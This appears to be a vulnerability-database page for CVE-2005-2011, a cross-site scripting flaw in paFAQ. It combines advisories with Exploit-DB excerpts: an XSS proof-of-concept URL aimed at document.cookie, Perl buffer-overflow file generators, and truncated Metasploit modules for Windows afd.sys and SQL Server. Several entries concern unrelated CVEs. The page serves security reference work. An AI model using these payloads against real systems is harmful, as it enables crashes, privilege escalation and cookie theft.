CVE-2005-2011
published 2005-06-20CVE-2005-2011: Multiple cross-site scripting (XSS) vulnerabilities in paFAQ 1.0 Beta 4 allow remote attackers to inject arbitrary web script or HTML, as demonstrated via the…
PriorityP416medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
1.42%
69.5th percentile
Multiple cross-site scripting (XSS) vulnerabilities in paFAQ 1.0 Beta 4 allow remote attackers to inject arbitrary web script or HTML, as demonstrated via the id parameter in a Question action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php_arena | pafaq | — | — |
CVSS provenance
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
cisa7.8HIGH
vendor_redhat7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-9ch3-rm27-g282: Multiple cross-site scripting (XSS) vulnerabilities in paFAQ 1
ghsa_unreviewed·2022-05-01
CVE-2005-2011 [MEDIUM] GHSA-9ch3-rm27-g282: Multiple cross-site scripting (XSS) vulnerabilities in paFAQ 1
Multiple cross-site scripting (XSS) vulnerabilities in paFAQ 1.0 Beta 4 allow remote attackers to inject arbitrary web script or HTML, as demonstrated via the id parameter in a Question action.
CISA
Microsoft Ancillary Function Driver (afd.sys) Improper Input Validation Vulnerability
cisa·2022-03-28·CVSS 7.8
CVE-2011-2005 [HIGH] CWE-264 Microsoft Ancillary Function Driver (afd.sys) Improper Input Validation Vulnerability
Vulnerability: Microsoft Ancillary Function Driver (afd.sys) Improper Input Validation Vulnerability
Affected: Microsoft Ancillary Function Driver (afd.sys)
afd.sys in the Ancillary Function Driver in Microsoft Windows does not properly validate user-mode input passed to kernel mode, which allows local users to gain privileges via a crafted application.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2011-2005
Remediation Due Date: 2022-04-18
Red Hat
squid: buffer overflow flaw in Squid's Gopher reply parser (SQUID-2011:3)
vendor_redhat·2011-08-28·CVSS 5.0
CVE-2011-3205 [MEDIUM] squid: buffer overflow flaw in Squid's Gopher reply parser (SQUID-2011:3)
squid: buffer overflow flaw in Squid's Gopher reply parser (SQUID-2011:3)
Buffer overflow in the gopherToHTML function in gopher.cc in the Gopher reply parser in Squid 3.0 before 3.0.STABLE26, 3.1 before 3.1.15, and 3.2 before 3.2.0.11 allows remote Gopher servers to cause a denial of service (memory corruption and daemon restart) or possibly have unspecified other impact via a long line in a response. NOTE: This issue exists because of a CVE-2005-0094 regression.
Package: squid (Red Hat Enterprise Linux 4) - Not affected
Package: squid (Red Hat Enterprise Linux 5) - Not affected
Red Hat
php: extract() can overwrite $GLOBALS and $this when using EXTR_OVERWRITE
vendor_redhat·2010-12-08·CVSS 7.5
CVE-2011-0752 [HIGH] php: extract() can overwrite $GLOBALS and $this when using EXTR_OVERWRITE
php: extract() can overwrite $GLOBALS and $this when using EXTR_OVERWRITE
The extract function in PHP before 5.2.15 does not prevent use of the EXTR_OVERWRITE parameter to overwrite (1) the GLOBALS superglobal array and (2) the this variable, which allows context-dependent attackers to bypass intended access restrictions by modifying data structures that were not intended to depend on external input, a related issue to CVE-2005-2691 and CVE-2006-3758.
Statement: We do not consider this flaw to be a security issue as it is only exploitable by the script author. No trust boundary is crossed.
This issue did not affect the versions of PHP as shipped with Red Hat Enterprise Linux 3, 4, or 5 (php). This issue was addressed in the php53 packages as shipped in Red Hat Enterprise Linux 5 before t
No detection rules found.
Exploit-DB
Microsoft Windows - 'AfdJoinLeaf' Local Privilege Escalation (MS11-080) (Metasploit)
exploitdb·2012-10-10
CVE-2011-2005 Microsoft Windows - 'AfdJoinLeaf' Local Privilege Escalation (MS11-080) (Metasploit)
Microsoft Windows - 'AfdJoinLeaf' Local Privilege Escalation (MS11-080) (Metasploit)
---
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/windows/priv'
class Metasploit3 'MS11-080 AfdJoinLeaf Privilege Escalation',
'Description' => %q{
This module exploits a flaw in the AfdJoinLeaf function of the
afd.sys driver to overwrite data in kernel space. An address
within the HalDispatchTable is overwritten and when triggered
with a call to NtQueryIntervalProfile will execute shellcode.
This module will elevate itself to SY
Exploit-DB
Bugbear FlatOut 2005 - '.bed' File Buffer Overflow
exploitdb·2011-11-30
CVE-2011-5173 Bugbear FlatOut 2005 - '.bed' File Buffer Overflow
Bugbear FlatOut 2005 - '.bed' File Buffer Overflow
---
#Exploit Title: FlatOut Malformed .bed file Buffer Overflow
# Date: 11-29-11
# Author: Silent Dream
# Software Link: http://www.gog.com/en/gamecard/flatout
# Version: Latest
# Tested on: Windows 7
#Tested on GOG.com copy of FlatOut. Exception offset = 61616161
#Multiple .bed files are vulnerable to buffer overflows...too many to even begin to list..
my $file = "playlist_0.bed";
my $head = "Title = \"";
my $junk = "a" x 3000 . "\"\r";
my $tail = "Loop = {" . "\r}";
open($File, ">$file");
print $File $head.$junk.$tail;
close($FILE);
print "Overwrite the original playlist_0.bed file in %program files%\\GOG.com\\FlatOut\\data\\music and launch flatout.exe...wait for the crash\r\n";
Exploit-DB
Microsoft Windows XP/2003 - 'afd.sys' Local Privilege Escalation (MS11-080)
exploitdb·2011-11-30·CVSS 7.8
CVE-2011-2005 [HIGH] Microsoft Windows XP/2003 - 'afd.sys' Local Privilege Escalation (MS11-080)
Microsoft Windows XP/2003 - 'afd.sys' Local Privilege Escalation (MS11-080)
---
################################################################################
######### MS11-080 - CVE-2011-2005 Afd.sys Privilege Escalation Exploit ########
######### Author: [email protected] - Matteo Memelli ########
######### Spaghetti & Pwnsauce ########
######### yuck! 0xbaadf00d Elwood@mac&cheese.com ########
######### ########
######### Thx to dookie(lifesaver)2000ca, dijital1 and ronin ########
######### for helping out! ########
######### ########
######### To my Master Shifu muts: ########
######### "So that's it, I just need inner peace?" ;) ########
######### ########
######### Exploit tested on the following 32bits systems: ########
######### Win XPSP3 Eng, Win 2K3SP2 Standard/Enterprise Eng
Exploit-DB
Microsoft Visual Studio Report Viewer 2005 Control - Multiple Cross-Site Scripting Vulnerabilities
exploitdb·2011-08-09
CVE-2011-1976 Microsoft Visual Studio Report Viewer 2005 Control - Multiple Cross-Site Scripting Vulnerabilities
Microsoft Visual Studio Report Viewer 2005 Control - Multiple Cross-Site Scripting Vulnerabilities
---
source: https://www.securityfocus.com/bid/49033/info
Microsoft Visual Studio is prone to multiple cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to spoof content or disclose sensitive information.
https://www.example.com/Reserved.ReportViewerWebControl.axd?Mode=true&ReportID=%3CarbitraryIDvalue%3E&ControlID=%3CvalidControlID%3E&Culture=1033&UICulture=1033&ReportStack=1&OpType=SessionKeepAlive&TimerMethod=KeepAliveMethodctl00_PlaceHolderMain_SiteTopUsersByHits_ctl00T
Exploit-DB
ZipWiz 2005 5.0 - '.zip' Buffer Corruption
exploitdb·2011-07-08
ZipWiz 2005 5.0 - '.zip' Buffer Corruption
ZipWiz 2005 5.0 - '.zip' Buffer Corruption
---
#!/usr/bin/perl
#
#[+]Exploit Title: ZipWiz 2005 v5.0 .ZIP File Buffer Corruption Exploit
#[+]Date: 08\07\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://download.cnet.com/ZipWiz-2005/3000-2250_4-10011590.html
#[+]Version: v5.0
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A
#
#
use strict;
use warnings;
my $filename = "Exploit.zip";
print "\n\n\t\tZipWiz 2005 v5.0 .ZIP File Buffer Corruption Exploit\n";
print "\t\tCreated by C4SS!0 G0M3S\n";
print "\t\tE-mail Louredo_\@hotmail.com\n";
print "\t\tSite www.exploit-br.org/\n\n";
sleep(1);
my $head = "\x50\x4B\x03\x04\x14\x00\x00".
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00" .
"\x00\x00\x00\x00\x00\x00\x00\x00" .
"\xe4\x0f" .
"\x00\x00\x00";
my $head2 = "\x50\x4B\x01\x02
Exploit-DB
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (via SQL Injection) (Metasploit)
exploitdb·2011-02-08
CVE-2008-5416 Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (via SQL Injection) (Metasploit)
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (via SQL Injection) (Metasploit)
---
##
# $Id: ms09_004_sp_replwritetovarbin_sqli.rb 11730 2011-02-08 23:31:44Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection',
'Description' => %q{
A heap-based buffer overflow can occur when calling the undocumented
"sp_replwritetovarbin" extended stored procedure. This vulnerability affects
all versions of Microsoft SQL Server 2000 and 2005, Window
Exploit-DB
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (Metasploit)
exploitdb·2011-01-24
CVE-2008-5416 Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (Metasploit)
Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (Metasploit)
---
##
# $Id: ms09_004_sp_replwritetovarbin.rb 11631 2011-01-24 19:37:58Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft SQL Server sp_replwritetovarbin Memory Corruption',
'Description' => %q{
A heap-based buffer overflow can occur when calling the undocumented
"sp_replwritetovarbin" extended stored procedure. This vulnerability affects
all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database,
and Microsoft Desktop
Exploit-DB
PAFaq - Question Cross-Site Scripting
exploitdb·2005-06-20
CVE-2005-2011 PAFaq - Question Cross-Site Scripting
PAFaq - Question Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/14001/info
paFaq is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
http://www.example.com/pafaq/index.php?act=Question&id=1%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
Bugzilla
CVE-2011-3205 squid: buffer overflow flaw in Squid's Gopher reply parser (SQUID-2011:3)
bugzilla·2011-08-30·CVSS 5.0
CVE-2011-3205 [MEDIUM] CVE-2011-3205 squid: buffer overflow flaw in Squid's Gopher reply parser (SQUID-2011:3)
CVE-2011-3205 squid: buffer overflow flaw in Squid's Gopher reply parser (SQUID-2011:3)
A flaw was reported [1] in how Squid parsed responses from Gopher servers. This flaw could result in a buffer overflow if a Gopher server were to return a line longer than 4096 bytes, leading to memory corruption and a crash. This flaw is an extension of SQUID-2005:1 (or CVE-2005-0094) in Squid 3.x, due to increased packet read sizes. A malicious user could setup a fake Gopher server and forward requests to it through Squid. A specially crafted response from that server could cause Squid to restart.
This has been corrected in upstream versions 3.2.0.11, 3.1.15, and 3.0.STABLE26. Patches for 3.0 [2], 3.1 [3], and 3.2 [4] are available.
[1] http://www.squid-cache.org/Advisories/SQUID-2011_3.txt
[2] htt
Bugzilla
CVE-2011-0284 krb5 (krb5kdc): Double-free flaw by handling error messages upon receiving certain AS_REQ's (MITKRB5-SA-2011-003)
bugzilla·2011-02-01·CVSS 5.0
CVE-2011-0284 [MEDIUM] CVE-2011-0284 krb5 (krb5kdc): Double-free flaw by handling error messages upon receiving certain AS_REQ's (MITKRB5-SA-2011-003)
CVE-2011-0284 krb5 (krb5kdc): Double-free flaw by handling error messages upon receiving certain AS_REQ's (MITKRB5-SA-2011-003)
A double-free flaw was found in the way the MIT Kerberos
KDC handled initial authentication requests (AS-REQ), when
the KDC was configured to provide the PKINIT capability.
A remote attacker could use this flaw to cause the KDC
daemon to abort by using a specially-crafted AS-REQ request.
Different vulnerability than CVE-2010-1320 and CVE-2005-1174.
Discussion:
Created attachment 476397
Proposed patch from Nalin Dahyabhai to fix the issue
---
This issue did NOT affect the versions of the krb5 package, as shipped
with Red Hat Enterprise Linux 3, 4, or 5.
This issue affects the version of the krb5 package, as shipped
with Red Hat Enterprise Linux 6.
--
This i
Bugzilla
CVE-2011-0530 NBD: CVE-2005-3534 reintroduced in upstream nbd-v2.9.0 version
bugzilla·2011-01-28·CVSS 7.5
CVE-2011-0530 [HIGH] CVE-2011-0530 NBD: CVE-2005-3534 reintroduced in upstream nbd-v2.9.0 version
CVE-2011-0530 NBD: CVE-2005-3534 reintroduced in upstream nbd-v2.9.0 version
Originally, CVE-2005-3534:
[1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3534
has been assigned to NBD and addressed in nbd-v2.8.3 version:
[2] http://sourceforge.net/project/shownotes.php?release_id=380202&group_id=13229
via changeset:
[3] https://github.com/yoe/nbd/commit/4ed24fe0d64c7cc9963c57b52cad1555ad7c6b60
But nbd-v2.9.0:
[4] http://sourceforge.net/projects/nbd/files/nbd/2.9.0/
contains the issue again. This flaw was fixed second time
via upstream changeset:
[5] https://github.com/yoe/nbd/commit/3ef52043861ab16352d49af89e048ba6339d6df8
References:
[6] http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=611187
Discussion:
This issue affects the versions of the nbd package, as shipped
with
2005-06-20
Published